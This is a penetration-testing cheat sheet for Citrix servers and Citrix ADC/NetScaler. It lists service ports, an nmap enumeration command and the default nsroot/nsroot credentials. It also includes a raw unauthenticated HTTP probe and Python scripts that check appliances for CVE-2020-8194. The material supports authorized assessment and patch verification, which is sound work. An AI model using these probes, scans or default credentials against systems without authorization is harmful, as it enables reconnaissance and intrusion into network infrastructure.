Citrix Servers - Ports
1604/udp - Citrix ICA browser service (the MetaFrame-era server/application browser; this is the port the nmap citrix-enum-* scripts talk to)
1494/tcp open citrix-ica  Citrix ICA session traffic (MetaFrame XP / XenApp / the Virtual Delivery Agent, VDA)
2598/tcp open citriximaclient  Citrix Session Reliability (CGP), ICA tunnelled with reconnect support
#The four ports below belong to Citrix ADC (NetScaler) load balancers: the Metric Exchange Protocol (MEP) used between GSLB/load-balancing nodes. 3008/3009 are the TLS-wrapped variants, which is why nmap reports ssl/ on them.
3008/tcp open ssl/midnight-tech?  (nmap guess; actually secure MEP)
3009/tcp open ssl/mep Citrix NetScaler Metric Exchange Protocol
3010/tcp open gw? Citrix NetScaler Gateway  (nmap guess; actually MEP)
3011/tcp open mep Citrix NetScaler Metric Exchange Protocol
nmap -sS -sU --script citrix-enum-apps,citrix-enum-servers -iL ips.txt -Pn -oA citrix
(-iL reads targets from a file; -i is not an nmap option. Both NSE scripts query the ICA browser service on UDP 1604, so keep -sU and that port in scope, e.g. -p T:1494,2598,3008-3011,U:1604 if you want the scan to finish quickly.)
For Citrix ADC - Default Username/Password : nsroot/nsroot
Finding Citrix ADC Version (NITRO REST API, needs valid credentials)
https://10.10.10.10/nitro/v1/config/nsversion
or
curl -X GET -H "Content-Type: application/json" -u nsroot:examplepassword http://<Citrix-ADC-IP-address(NSIP)>/nitro/v1/config/nsversion
curl -X GET -H "Content-Type: application/json" -u <username>:<examplepassword> http://<Citrix-ADC-IP-address(NSIP)>/nitro/v1/config/nslicense
(If the NSIP only answers over HTTPS with the self-signed certificate the appliance ships with, use https:// and add -k.)
Testing Citrix ADC & Citrix Gateway for CVE-2020-8194
This vulnerability (reflected code injection, part of Citrix advisory CTX276688) is present in Citrix ADC and Citrix Gateway versions before 13.0-58.30, 12.1-57.18, 12.0-63.21, 11.1-64.14, and 10.5-70.18. Compare the build returned by nsversion against the fixed build on the same branch.
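To turn the version list above into a repeatable check, here is an added Python example (not code from the original page or from Citrix): it pulls the version string out of a NITRO nsversion reply, parses the branch and build, and compares the build against the fixed builds quoted above. The sample JSON reply is constructed for illustration, and the fetch_version helper (HTTPS with basic auth, certificate not verified, like curl -k) is my addition.

```python
import base64
import json
import re
import ssl
import urllib.request

# Fixed builds from the advisory text above: a build on the same branch that is
# lower than the listed one is affected by CVE-2020-8194.
FIXED_BUILDS_CVE_2020_8194 = {
    "13.0": (58, 30),
    "12.1": (57, 18),
    "12.0": (63, 21),
    "11.1": (64, 14),
    "10.5": (70, 18),
}

# NITRO reports the version as e.g. "NetScaler NS13.0: Build 47.24.nc, Date: Nov 29 2019"
_VERSION_RE = re.compile(r"NS(\d+\.\d+):\s*Build\s+(\d+)\.(\d+)")

# Constructed sample of a /nitro/v1/config/nsversion reply (not captured from a real device).
SAMPLE_NSVERSION_REPLY = json.dumps({
    "errorcode": 0,
    "message": "Done",
    "severity": "NONE",
    "nsversion": {"version": "NetScaler NS13.0: Build 47.24.nc, Date: Nov 29 2019", "mode": "1"},
})


def version_from_nsversion_reply(body):
    """Pull the version string out of a NITRO nsversion JSON reply; raise on a NITRO error."""
    data = json.loads(body)
    if data.get("errorcode", 0) != 0:
        raise ValueError("NITRO error %s: %s" % (data.get("errorcode"), data.get("message")))
    return data["nsversion"]["version"]


def parse_ns_version(version_string):
    """Return (branch, (build, point)), e.g. ("13.0", (47, 24)), or None if unrecognised."""
    m = _VERSION_RE.search(version_string)
    if not m:
        return None
    return m.group(1), (int(m.group(2)), int(m.group(3)))


def is_vulnerable_cve_2020_8194(version_string):
    """True if the build predates the fix on its branch, False if it is at or past the fix,
    None if the branch is not covered by the advisory (e.g. 13.1; check it manually)."""
    parsed = parse_ns_version(version_string)
    if parsed is None:
        raise ValueError("unrecognised version string: %r" % (version_string,))
    branch, build = parsed
    fixed = FIXED_BUILDS_CVE_2020_8194.get(branch)
    if fixed is None:
        return None
    return build < fixed  # tuple comparison: (47, 24) < (58, 30)


def fetch_version(nsip, username, password, verify_tls=False):
    """GET /nitro/v1/config/nsversion over HTTPS with basic auth, like the curl line above.
    verify_tls=False is the equivalent of curl -k for a self-signed appliance certificate."""
    url = "https://%s/nitro/v1/config/nsversion" % nsip
    req = urllib.request.Request(url, headers={"Content-Type": "application/json"})
    token = base64.b64encode(("%s:%s" % (username, password)).encode()).decode()
    req.add_header("Authorization", "Basic " + token)
    ctx = ssl.create_default_context()
    if not verify_tls:
        ctx.check_hostname = False
        ctx.verify_mode = ssl.CERT_NONE
    with urllib.request.urlopen(req, context=ctx, timeout=15) as resp:
        return version_from_nsversion_reply(resp.read().decode("utf-8", "replace"))


if __name__ == "__main__":
    import sys
    if len(sys.argv) == 4:  # <nsip> <user> <password>: query a real appliance
        ver = fetch_version(sys.argv[1], sys.argv[2], sys.argv[3])
    else:                   # no arguments: run against the constructed sample reply
        ver = version_from_nsversion_reply(SAMPLE_NSVERSION_REPLY)
    verdict = {True: "VULNERABLE", False: "patched", None: "branch not in advisory"}
    print(ver, "->", verdict[is_vulnerable_cve_2020_8194(ver)])
```

Run it with no arguments to see the constructed sample classified, or with `nsip user password` to query a real NSIP. The comparison is per branch on purpose: 12.1-57.18 is fixed even though 13.0-47.24 is a higher branch and still vulnerable.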
Send the request below (unauthenticated; the X-NITRO-USER/X-NITRO-PASS values are throwaway strings) and check whether the response contains a NITRO error, i.e. a JSON or XML body carrying an errorcode. A NITRO reply from /pcidss/report before any login is the indicator the public PoCs use for an unpatched build; it shows the endpoint is reachable, not that the injection succeeded, so confirm with the nsversion check before reporting.
POST /pcidss/report?type=allprofiles&sid=loginchallengeresponse1requestbody&username=nsroot&set=1 HTTP/1.1
Host: 10.10.10.10
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.5112.102 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
Content-Type: application/xml
X-NITRO-USER: ht3yh6sQ
X-NITRO-PASS: q3d15maS
Content-Length: 46
<appfwprofile><login></login></appfwprofile>
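The same probe as a script, added here as an example and not taken from the page or from any of the public PoCs: it sends the request above over HTTPS with http.client and reports whether the body looks like a NITRO error. What counts as a NITRO error here (a JSON object with an errorcode key, or an XML errorcode element) is my assumption, the sample replies are constructed, and Accept-Encoding is set to identity instead of gzip so the body can be inspected as text.

```python
import http.client
import json
import re
import ssl

# Request line and body from the raw HTTP above.
PROBE_PATH = ("/pcidss/report?type=allprofiles"
              "&sid=loginchallengeresponse1requestbody&username=nsroot&set=1")
PROBE_BODY = "<appfwprofile><login></login></appfwprofile>"
USER_AGENT = ("Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 "
              "(KHTML, like Gecko) Chrome/104.0.5112.102 Safari/537.36")

# Assumption: a NITRO error reply is JSON with an "errorcode" key or XML with <errorcode>.
_XML_ERRORCODE = re.compile(r"<errorcode>\s*(-?\d+)\s*</errorcode>", re.IGNORECASE)

# Constructed sample replies (not captured from a real appliance) for the classifier.
SAMPLE_NITRO_JSON = '{ "errorcode": 1090, "message": "Invalid user name or password", "severity": "ERROR" }'
SAMPLE_NITRO_XML = '<?xml version="1.0"?><response><errorcode>1090</errorcode></response>'
SAMPLE_LOGIN_PAGE = "<html><body>Citrix Gateway login</body></html>"


def build_probe_request(host):
    """Return (method, path, headers, body) matching the raw request above."""
    headers = {
        "Host": host,
        "User-Agent": USER_AGENT,
        "Accept-Encoding": "identity",   # raw request says gzip; identity keeps the body readable
        "Accept": "*/*",
        "Connection": "close",
        "Content-Type": "application/xml",
        "X-NITRO-USER": "ht3yh6sQ",      # throwaway values, as in the raw request
        "X-NITRO-PASS": "q3d15maS",
        "Content-Length": str(len(PROBE_BODY)),
    }
    return "POST", PROBE_PATH, headers, PROBE_BODY


def nitro_errorcode_in(body):
    """Return the NITRO errorcode carried in a response body, or None if there is none.
    errorcode 0 ("Done") also counts: it proves the request was handled by NITRO."""
    text = body.decode("utf-8", "replace") if isinstance(body, bytes) else body
    stripped = text.lstrip()
    if stripped.startswith("{"):
        try:
            data = json.loads(stripped)
        except ValueError:
            data = None
        if isinstance(data, dict) and "errorcode" in data:
            return int(data["errorcode"])
    m = _XML_ERRORCODE.search(text)
    return int(m.group(1)) if m else None


def classify_probe_response(status, body):
    """Summarise what a reply to the probe means for the tester."""
    code = nitro_errorcode_in(body)
    if code is not None:
        verdict = "NITRO reply from unauthenticated /pcidss/report: likely unpatched, confirm with nsversion"
    elif status in (401, 403):
        verdict = "endpoint rejected: looks patched or filtered"
    else:
        verdict = "no NITRO structure in reply: inconclusive"
    return {"status": status, "nitro_errorcode": code, "verdict": verdict}


def send_probe(host, port=443, timeout=15):
    """Send the probe over HTTPS; the certificate is not verified (self-signed lab appliances)."""
    method, path, headers, body = build_probe_request(host)
    ctx = ssl.create_default_context()
    ctx.check_hostname = False
    ctx.verify_mode = ssl.CERT_NONE
    conn = http.client.HTTPSConnection(host, port, timeout=timeout, context=ctx)
    try:
        conn.request(method, path, body=body.encode(), headers=headers)
        resp = conn.getresponse()
        return classify_probe_response(resp.status, resp.read())
    finally:
        conn.close()


if __name__ == "__main__":
    import sys
    if len(sys.argv) > 1:   # <host>: probe a real appliance
        print(send_probe(sys.argv[1]))
    else:                   # no arguments: show the classifier on the constructed samples
        for status, body in ((200, SAMPLE_NITRO_JSON), (200, SAMPLE_NITRO_XML), (403, SAMPLE_LOGIN_PAGE)):
            print(classify_probe_response(status, body))
```

The network part and the classification are deliberately separate so the verdict logic can be exercised on captured responses (for example from Burp) without re-sending the probe.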
PoC script on GitHub - One more